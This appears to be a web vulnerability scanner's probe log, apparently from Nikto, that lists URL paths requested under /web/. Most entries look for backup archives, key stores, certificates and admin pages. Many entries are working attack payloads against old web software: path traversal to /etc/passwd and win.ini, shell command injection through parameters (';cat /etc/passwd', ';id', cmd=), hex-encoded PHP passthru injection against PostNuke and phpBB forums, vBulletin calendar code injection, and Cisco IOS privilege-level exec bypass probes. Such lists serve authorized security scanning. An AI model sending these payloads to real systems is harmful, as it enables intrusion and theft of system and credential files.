/
/web/
/web/
/web/WJJN3UUF.html
/web/WJJN3UUF.asp
/web/WJJN3UUF.cgi
/web/WJJN3UUF.cmd
/web/WJJN3UUF.exe|dir
/web/WJJN3UUF.cfm
/web/WJJN3UUF.php3
/web/WJJN3UUF.dll
/web/WJJN3UUF.idc
/web/WJJN3UUF.htm
/web/WJJN3UUF.php
/web/WJJN3UUF.exe
/web/.WJJN3UUF
/web/WJJN3UUF.BBoardServlet
/web/WJJN3UUF.rdf+destype=cache+desformat=PDF
/web/WJJN3UUF.bat
/web/WJJN3UUF
/web/WJJN3UUF.pl
/web/WJJN3UUF/
/web/WJJN3UUF.txt
/web/WJJN3UUF.10:100
/web/WJJN3UUF.pl|dir
/web/index.php?
/web/
/web/clientaccesspolicy.xml
/web/crossdomain.xml
/web/robots.txt
/web/index
/web
/web
/web/index.asp
/web/junk999.asp
/web/index.aspx
/web/junk988.aspx
/web/login.asp
/web/login.aspx
/web/
/web/images
/web/Autodiscover/Autodiscover.xml
/web/Autodiscover/
/web/Microsoft-Server-ActiveSync
/web/Microsoft-Server-ActiveSync/default.css
/web/ECP
/web/EWS
/web/EWS/Exchange.asmx
/web/Exchange
/web/OWA
/web/Microsoft-Server-ActiveSync/default.eas
/web/Rpc
/web/EWS/Services.wsdl
/web/ecp
/web/OAB
/web/aspnet_client
/web/PowerShell
/web.
/web/
/web/
/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini%00
/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini%00
/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini%00
/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/HASH(0x55e935b84710)%00
/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts%00
/web/
/web/favicon.ico
/web/favicons/favicon.ico
/web/favicon.gif
/web/favicons/favicon.gif
/web/favicon.png
/web/favicons/favicon.png
/web/
/web/domcfg.nsf
/web/admin.nsf
/web/admin4.nsf
/web/admin5.nsf
/web/webadmin.nsf
/web/nonexistent.nsf
/web
/web/backup.war
/web/backup.war
/web/1.zip
/web/1.zip
/web/168.jks
/web/168.jks
/web/192.168.1.tar
/web/192.168.1.tar
/web/192_168_1_101.tar.gz
/web/192_168_1_101.tar.gz
/web/1921681.zip
/web/1921681.zip
/web/168.tar
/web/168.tar
/web/101.egg
/web/101.egg
/web/192168.tar.lzma
/web/192168.tar.lzma
/web/101.alz
/web/101.alz
/web/1921681.sql
/web/1921681.sql
/web/192.168.1.tgz
/web/192.168.1.tgz
/web/1.tgz
/web/1.tgz
/web/192.168.1.101.tar
/web/192.168.1.101.tar
/web/1921681.tar.gz
/web/1921681.tar.gz
/web/192_168_1_101.egg
/web/192_168_1_101.egg
/web/168.cer
/web/168.cer
/web/site.war
/web/site.war
/web/1921681101.sql
/web/1921681101.sql
/web/192168.tgz
/web/192168.tgz
/web/1.war
/web/1.war
/web/192.war
/web/192.war
/web/192.168.1.sql
/web/192.168.1.sql
/web/backup.zip
/web/backup.zip
/web/192_168_1_101.tgz
/web/192_168_1_101.tgz
/web/site.tar
/web/site.tar
/web/168.zip
/web/168.zip
/web/192.168.tar.lzma
/web/192.168.tar.lzma
/web/site.cer
/web/site.cer
/web/101.pem
/web/101.pem
/web/192.168.1.101.cer
/web/192.168.1.101.cer
/web/192.168.1.101.jks
/web/192.168.1.101.jks
/web/site.tar.gz
/web/site.tar.gz
/web/1.sql
/web/1.sql
/web/192.tgz
/web/192.tgz
/web/192.168.war
/web/192.168.war
/web/192.168.pem
/web/192.168.pem
/web/101.tar.bz2
/web/101.tar.bz2
/web/1921681101.alz
/web/1921681101.alz
/web/192168.jks
/web/192168.jks
/web/101.tar.gz
/web/101.tar.gz
/web/site.egg
/web/site.egg
/web/192.168.1.101.war
/web/192.168.1.101.war
/web/1921681101.tar.bz2
/web/1921681101.tar.bz2
/web/192.tar.lzma
/web/192.tar.lzma
/web/1.alz
/web/1.alz
/web/192_168_1_101.tar.bz2
/web/192_168_1_101.tar.bz2
/web/1.tar.gz
/web/1.tar.gz
/web/1921681.alz
/web/1921681.alz
/web/1921681101.pem
/web/1921681101.pem
/web/192168.alz
/web/192168.alz
/web/1921681.egg
/web/1921681.egg
/web/192168.sql
/web/192168.sql
/web/192168.pem
/web/192168.pem
/web/192.168.1.war
/web/192.168.1.war
/web/168.pem
/web/168.pem
/web/192_168_1_101.pem
/web/192_168_1_101.pem
/web/192.168.1.zip
/web/192.168.1.zip
/web/192.168.1.alz
/web/192.168.1.alz
/web/101.zip
/web/101.zip
/web/168.tar.bz2
/web/168.tar.bz2
/web/1921681101.egg
/web/1921681101.egg
/web/1.tar.bz2
/web/1.tar.bz2
/web/168.tar.gz
/web/168.tar.gz
/web/192_168_1_101.zip
/web/192_168_1_101.zip
/web/backup.tar.gz
/web/backup.tar.gz
/web/1921681.cer
/web/1921681.cer
/web/1921681101.tar.lzma
/web/1921681101.tar.lzma
/web/192168.tar
/web/192168.tar
/web/192.168.tgz
/web/192.168.tgz
/web/site.zip
/web/site.zip
/web/192.168.1.egg
/web/192.168.1.egg
/web/192.168.1.tar.gz
/web/192.168.1.tar.gz
/web/192.168.1.101.alz
/web/192.168.1.101.alz
/web/101.jks
/web/101.jks
/web/1921681101.tar
/web/1921681101.tar
/web/192_168_1_101.sql
/web/192_168_1_101.sql
/web/192.168.1.101.tar.lzma
/web/192.168.1.101.tar.lzma
/web/1.pem
/web/1.pem
/web/101.tar
/web/101.tar
/web/1921681.tar.bz2
/web/1921681.tar.bz2
/web/168.egg
/web/168.egg
/web/1.egg
/web/1.egg
/web/192168.tar.bz2
/web/192168.tar.bz2
/web/192.sql
/web/192.sql
/web/backup.cer
/web/backup.cer
/web/1921681101.tar.gz
/web/1921681101.tar.gz
/web/192.168.1.cer
/web/192.168.1.cer
/web/168.alz
/web/168.alz
/web/site.jks
/web/site.jks
/web/192.168.jks
/web/192.168.jks
/web/backup.egg
/web/backup.egg
/web/1921681.tar
/web/1921681.tar
/web/101.cer
/web/101.cer
/web/1921681.pem
/web/1921681.pem
/web/1921681.war
/web/1921681.war
/web/backup.tgz
/web/backup.tgz
/web/192.jks
/web/192.jks
/web/192.168.1.101.tar.bz2
/web/192.168.1.101.tar.bz2
/web/1.tar.lzma
/web/1.tar.lzma
/web/101.sql
/web/101.sql
/web/192_168_1_101.war
/web/192_168_1_101.war
/web/192.tar
/web/192.tar
/web/site.tar.lzma
/web/site.tar.lzma
/web/backup.tar.lzma
/web/backup.tar.lzma
/web/192.168.1.101.tgz
/web/192.168.1.101.tgz
/web/1921681.tar.lzma
/web/1921681.tar.lzma
/web/192.cer
/web/192.cer
/web/192.168.1.tar.bz2
/web/192.168.1.tar.bz2
/web/192168.war
/web/192168.war
/web/192_168_1_101.cer
/web/192_168_1_101.cer
/web/192_168_1_101.jks
/web/192_168_1_101.jks
/web/168.war
/web/168.war
/web/192.168.tar.gz
/web/192.168.tar.gz
/web/192_168_1_101.tar
/web/192_168_1_101.tar
/web/192.168.sql
/web/192.168.sql
/web/1921681101.cer
/web/1921681101.cer
/web/192.168.1.101.egg
/web/192.168.1.101.egg
/web/192.zip
/web/192.zip
/web/192.168.1.tar.lzma
/web/192.168.1.tar.lzma
/web/backup.jks
/web/backup.jks
/web/168.tgz
/web/168.tgz
/web/192.168.1.101.tar.gz
/web/192.168.1.101.tar.gz
/web/192168.zip
/web/192168.zip
/web/168.tar.lzma
/web/168.tar.lzma
/web/192.168.zip
/web/192.168.zip
/web/site.tgz
/web/site.tgz
/web/backup.tar
/web/backup.tar
/web/site.sql
/web/site.sql
/web/101.war
/web/101.war
/web/site.pem
/web/site.pem
/web/192.pem
/web/192.pem
/web/101.tgz
/web/101.tgz
/web/1921681.jks
/web/1921681.jks
/web/1921681101.war
/web/1921681101.war
/web/192.168.tar
/web/192.168.tar
/web/1.cer
/web/1.cer
/web/192168.tar.gz
/web/192168.tar.gz
/web/192.tar.bz2
/web/192.tar.bz2
/web/192_168_1_101.alz
/web/192_168_1_101.alz
/web/192.168.1.101.sql
/web/192.168.1.101.sql
/web/site.alz
/web/site.alz
/web/192.tar.gz
/web/192.tar.gz
/web/backup.alz
/web/backup.alz
/web/192.168.tar.bz2
/web/192.168.tar.bz2
/web/192_168_1_101.tar.lzma
/web/192_168_1_101.tar.lzma
/web/101.tar.lzma
/web/101.tar.lzma
/web/backup.pem
/web/backup.pem
/web/backup.sql
/web/backup.sql
/web/1.tar
/web/1.tar
/web/1921681101.zip
/web/1921681101.zip
/web/192.168.1.101.zip
/web/192.168.1.101.zip
/web/192168.egg
/web/192168.egg
/web/192.168.cer
/web/192.168.cer
/web/192.egg
/web/192.egg
/web/1921681101.jks
/web/1921681101.jks
/web/1921681.tgz
/web/1921681.tgz
/web/192.168.1.jks
/web/192.168.1.jks
/web/168.sql
/web/168.sql
/web/192.168.1.pem
/web/192.168.1.pem
/web/192.168.alz
/web/192.168.alz
/web/1.jks
/web/1.jks
/web/192168.cer
/web/192168.cer
/web/backup.tar.bz2
/web/backup.tar.bz2
/web/site.tar.bz2
/web/site.tar.bz2
/web/192.alz
/web/192.alz
/web/192.168.egg
/web/192.168.egg
/web/192.168.1.101.pem
/web/192.168.1.101.pem
/web/1921681101.tgz
/web/1921681101.tgz
/web/index.php
/web/index.php3
/web/index.php4
/web/index.php5
/web/index.php7
/web/index.html
/web/index.htm
/web/index.shtml
/web/index.cfm
/web/index.cgi
/web/index.pl
/web/index.asp
/web/index.aspx
/web/default.asp
/web/default.aspx
/web/default.htm
/web/index.do
/web/index.jhtml
/web/index.jsp
/web/index.xml
/web/nikto-test-Rwjvseg2.html
/web/~bin
/web/v2/_catalog
/web*
/web/
/web/
/web/
/web/
/web/
/web/admin.cgi
/web/administrator.cgi
/web/authLogin.cgi
/web/bb-hist.sh
/web/banner.cgi
/web/book.cgi
/web/cgiinfo.cgi
/web/cgitest.py
/web/cgi_wrapper
/web/contact.cgi
/web/count.cgi
/web/defaultwebpage.cgi
/web/download.cgi
/web/entropysearch.cgi
/web/env.cgi
/web/environment.cgi
/web/ezmlm-browse
/web/formmail.cgi
/web/FormMail-clone.cgi
/web/guestbook.cgi
/web/helpdesk.cgi
/web/index.cgi
/web/index.php
/web/index.pl
/web/info.cgi
/web/info.sh
/web/loadpage.cgi
/web/login.cgi
/web/login.php
/web/login.pl
/web/pathtest.pl
/web/php
/web/php4
/web/php5
/web/php-cgi
/web/php.cgi
/web/php.fcgi
/web/printenv
/web/restore_config.cgi
/web/ruby.rb
/web/search
/web/search.cgi
/web/server.php
/web/status
/web/sysinfo.pl
/web/test
/web/test-cgi
/web/test.cgi
/web/test_cgi.php
/web/test.cgi.php
/web/test_cgi.pl
/web/test-cgi.pl
/web/test.py
/web/test.sh
/web/uname.cgi
/web/viewcvs.cgi
/web/welcome
/web/whois.cgi
/web/
/web/
/web/index.action
/web/login.action
/web/cfappman/index.cfm
/web/cfdocs/examples/cvbeans/beaninfo.cfm
/web/cfdocs/examples/parks/detail.cfm
/web/kboard/
/web/lists/admin/
/web/splashAdmin.php
/web/ssdefs/
/web/sshome/
/web/tiki/
/web/tiki/tiki-install.php
/web/scripts/samples/details.idc
/web/forumdisplay.php?GLOBALS\[\]=1&f=2&comma=\".system\('id'\)\.\"
/web/guestbook/guestbook.html
/web/html/cgi-bin/cgicso?query=AAA
/web/bb-dnbd/faxsurvey
/web/cartcart.cgi
/web/scripts/Carello/Carello.dll
/web/w-agora/
/web/cgi-local/cgiemail-1.6/cgicso?query=AAA
/web/servlet/SchedulerTransfer
/web/servlet/sunexamples.BBoardServlet
/web/servlets/SchedulerTransfer
/web/perl/-e%20print%20Hello
/web/msadc/samples/adctest.asp
/web/athenareg.php?pass=%20;cat%20/etc/passwd
/web/cd-cgi/sscd_suncourier.pl
/web/cgi-bin/handler
/web/cgi-bin/handler/netsonar;cat
/web/cgi-bin/webdist.cgi
/web/DB4Web/10.10.10.10:100
/web/ews/ews/architext_query.pl
/web/exec/show/config/cr
/web/instantwebmail/message.php
/web/cfdocs/snippets/gettempdirectory.cfm
/web/dostuff.php?action=modify_user
/web/logjam/showhits.php
/web/manual.php
/web/mods/apage/apage.cgi?f=file.htm.|id|
/web/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
/web/nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
/web/perl/-e%20%22system('cat%20/etc/passwd');\%22
/web/phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
/web/phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
/web/Program%20Files/
/web/smssend.php
/web/pls/simpledad/admin_/dadentries.htm
/web/level/16/exec/-///pwd
/web/level/16/exec/-///show/configuration
/web/level/16
/web/level/16/exec/
/web/level/16/exec//show/access-lists
/web/level/16/level/16/exec//show/configuration
/web/level/16/level/16/exec//show/interfaces
/web/level/16/level/16/exec//show/interfaces/status
/web/level/16/level/16/exec//show/version
/web/level/16/level/16/exec//show/running-config/interface/FastEthernet
/web/level/16/exec//show
/web/level/17/exec//show
/web/level/18/exec//show
/web/level/19/exec//show
/web/level/20/exec//show
/web/level/21/exec//show
/web/level/22/exec//show
/web/level/23/exec//show
/web/level/24/exec//show
/web/level/25/exec//show
/web/level/26/exec//show
/web/level/27/exec//show
/web/level/28/exec//show
/web/level/29/exec//show
/web/level/30/exec//show
/web/level/31/exec//show
/web/level/32/exec//show
/web/level/33/exec//show
/web/level/34/exec//show
/web/level/35/exec//show
/web/level/36/exec//show
/web/level/37/exec//show
/web/level/38/exec//show
/web/level/39/exec//show
/web/level/40/exec//show
/web/level/41/exec//show
/web/level/42/exec//show
/web/level/43/exec//show
/web/level/44/exec//show
/web/level/45/exec//show
/web/level/46/exec//show
/web/level/47/exec//show
/web/level/48/exec//show
/web/level/49/exec//show
/web/level/50/exec//show
/web/level/51/exec//show
/web/level/52/exec//show
/web/level/53/exec//show
/web/level/54/exec//show
/web/level/55/exec//show
/web/level/56/exec//show
/web/level/57/exec//show
/web/level/58/exec//show
/web/level/59/exec//show
/web/level/60/exec//show
/web/level/61/exec//show
/web/level/62/exec//show
/web/level/63/exec//show
/web/level/64/exec//show
/web/level/65/exec//show
/web/level/66/exec//show
/web/level/67/exec//show
/web/level/68/exec//show
/web/level/69/exec//show
/web/level/70/exec//show
/web/level/71/exec//show
/web/level/72/exec//show
/web/level/73/exec//show
/web/level/74/exec//show
/web/level/75/exec//show
/web/level/76/exec//show
/web/level/77/exec//show
/web/level/78/exec//show
/web/level/79/exec//show
/web/level/80/exec//show
/web/level/81/exec//show
/web/level/82/exec//show
/web/level/83/exec//show
/web/level/84/exec//show
/web/level/85/exec//show
/web/level/86/exec//show
/web/level/87/exec//show
/web/level/88/exec//show
/web/level/89/exec//show
/web/level/90/exec//show
/web/level/91/exec//show
/web/level/92/exec//show
/web/level/93/exec//show
/web/level/94/exec//show
/web/level/95/exec//show
/web/level/96/exec//show
/web/level/97/exec//show
/web/level/98/exec//show
/web/level/99/exec//show
/web/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/modules/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/forum/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/html/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/modules/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/phpBB/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/forum/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/modules/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/phpBB/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/forum/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/html/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/modules/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/phpBB/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/forum/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/modules/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/forum/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/html/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/modules/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/phpBB/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/forum/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/modules/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/phpBB/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/forum/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/postnuke/html/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/modules/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/phpBB/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/forum/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
/web/msadc/msadcs.dll
/web/uploader.php
/web/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
/web/forum/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
/web/forums/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
/web/forumz/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
/web/htforum/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
/web/board/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
/web/community/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
/web/vb/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
/web/vbulletin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
/web/_vti_bin/fpcount.exe
/web/site/eg/source.asp
/web/admin/system.php3?cmd=cat%20/etc/passwd
/web/admin/system.php3?cmd=dir%20c:\\
/web/admin/exec.php3?cmd=cat%20/etc/passwd
/web/admin/exec.php3?cmd=dir%20c:\\
/web/isapi/tstisapi.dll
